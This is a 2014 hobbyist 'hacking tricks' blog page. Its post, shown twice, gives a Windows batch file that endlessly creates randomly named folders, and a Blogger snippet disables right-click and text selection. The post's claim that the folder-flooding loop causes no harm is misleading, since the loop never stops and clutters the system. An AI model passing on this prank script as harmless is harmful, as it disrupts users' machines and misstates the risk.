#Hv
Sunday, July 20, 2014
How To Make more than thousands of folder Using notepad
Make thousands of folder with notepad.
1. Open notepad.
2. Copy the following code:
@echo off
:top
md %random%
goto top
3. save it as fun.bat
If you will open that file that folder will be rained by more than thousand of folders. It will not cause any harm to your computer
Make thousands of folder with notepad.
1. Open notepad.
2. Copy the following code:
@echo off
:top
md %random%
goto top
3. save it as fun.bat
If you will open that file that folder will be rained by more than thousand of folders. It will not cause any harm to your computer
Sunday, July 6, 2014
On 20:29 by Harsh Bothra 3 comments
If you own a blog or a website then you always want to prevent other malicious bloggers from copying the content from your blog. You might have written an article with great efforts and lots of research and other just copy/paste it on their blog. To prevent such users from copying content from your blog i will show you Javascript Trick to disable right click on your blog. So lets get started.
How To Disable Right Click On Your Blog ?
1. Got to your blogger Dashboard and then Click on Layout.
2. Now Click on Add Gadget and select Html/Javascript.
3. Now paste code given below in the pop up window.
<!--MBW Code-->4. Save it and done. Now users will not be able to right click on your website. 5. If you like to disable mouse on your computer then check out tutorial given below.
<script language='JavaScript1.2'>
function disableselect(e){
return false
}
function reEnable(){
return true
}
document.onselectstart=new Function ("return false")
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
</script>
<!--Code End http://mybloggersworld.blogspot.in>
Subscribe to:
Posts (Atom)
Search
Google Bedge
Popular Posts
Recent Posts
Categories
- Hacking Tech. (55)
- Hacking Tricks (28)
- windows (18)
- social networking (11)
- website hacking (11)
- cellular hacking (7)
- Download (5)
- Serial keys (5)
- google hacking (5)
- Ethical (3)
- Trojans & Viruses (3)
- linux (3)
- Botware (2)
- backtracking (2)
- crypto. (2)
- ethical hacking (2)
- hacking soft (2)
- Steganography (1)
- about us (1)
- how to be a hacker (1)
- keyloggers (1)
- we (1)
About Me
- Harsh Bothra
- Harsh Bothra, Ethical Hacker & Security Researcher, n00b and love to learn about pen testing and cyber world.Also engaged in robotics and cyber forensics Founder of TechNoFense : Technology for Defense
Team Young Anonymous. Powered by Blogger.


